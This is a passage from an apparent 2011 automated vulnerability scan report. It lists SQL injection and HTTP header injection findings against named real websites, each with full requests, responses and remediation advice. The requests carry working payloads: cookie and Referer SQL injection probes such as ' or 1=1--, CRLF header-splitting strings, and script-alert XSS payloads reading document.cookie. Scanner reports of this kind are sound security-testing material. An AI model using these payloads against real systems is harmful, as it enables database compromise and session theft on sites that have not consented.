Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.121473983'%20or%201%3d1--%20; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:30:47 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:31:47 GMT
Connection: close
Content-Type: text/html
Content-Length: 85141

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Quick Reference Chart</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldm
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=150531244;u=j;z=20110218123047" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=150531244;u=j;z=20110218123047" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644256/641606/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=1276478049;u=j;z=20110218123047" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=1276478049;u=j;z=20110218123047" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD>
</TR>
<TR>
<TD WIDTH="150" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/voip_wholesalers/chart.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641817/641606/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641817/641606/641605/581996/581034;s
...[SNIP]...

Request 2

GET /services/voip_wholesalers/chart.html HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.121473983'%20or%201%3d2--%20; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:30:49 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:31:49 GMT
Connection: close
Content-Type: text/html
Content-Length: 85131

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Quick Reference Chart</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldm
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=5063581;u=j;z=20110218123049" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=5063581;u=j;z=20110218123049" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644256/641606/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=296806960;u=j;z=20110218123049" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=296806960;u=j;z=20110218123049" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD>
</TR>
<TR>
<TD WIDTH="150" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/voip_wholesalers/chart.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641817/641606/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641817/641606/641605/581996/581034;s=9538;
...[SNIP]...

1.12. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:56:22 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:56:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...

1.13. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /outsourcing-dot-net-development-contact-us.html?1'=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:56:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /outsourcing-dot-net-development-contact-us.html?1''=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:56:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 10176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...

1.14. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:03:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:03:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=5rucoa6at9abkm1iohmum4tot6; path=/
Connection: close
Content-Type: text/html
Content-Length: 20709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.15. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /xss-cross-site-scripting.html?1'=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:02:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=csfbfupdfs7fadg0nmfn1lj946; path=/
Connection: close
Content-Type: text/html
Content-Length: 7658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /xss-cross-site-scripting.html?1''=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:02:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=rmdtso7ajurlau4d8tk2uvoj34; path=/
Connection: close
Content-Type: text/html
Content-Length: 19753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.16. http://www.phpbuilder.com/ [QUADIDX cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The QUADIDX cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the QUADIDX cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1 HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.phpbuilder.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107'; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:02:03 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:03:03 GMT
Content-Type: text/html
Content-Length: 72630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<a href="/columns/tim20000705.php3">MySQL and PostgreSQL Compared</a>
...[SNIP]...

Request 2

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1 HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.phpbuilder.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107''; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:02:04 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:03:04 GMT
Content-Type: text/html
Content-Length: 72646


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...

2. HTTP header injection
There are 32 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6d131%0d%0ac8d42010e20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif6d131%0d%0ac8d42010e20?%r? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif6d131
c8d42010e20
:
Date: Fri, 18 Feb 2011 15:53:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://j.jioet.com/cgi/r [;n parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the ;n request parameter is copied into the Location response header. The payload a7230%0d%0a38761888e3a was submitted in the ;n parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110a7230%0d%0a38761888e3a&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:33 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qZQqABU0AAG@IOQw; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:33 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:33 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk163110218044733050ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:33 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110a7230
38761888e3a
&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=163110218044733050&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.3. http://j.jioet.com/cgi/r [InternalReferralURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the InternalReferralURL request parameter is copied into the Location response header. The payload 17105%0d%0a761b2c412d9 was submitted in the InternalReferralURL parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=17105%0d%0a761b2c412d9&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
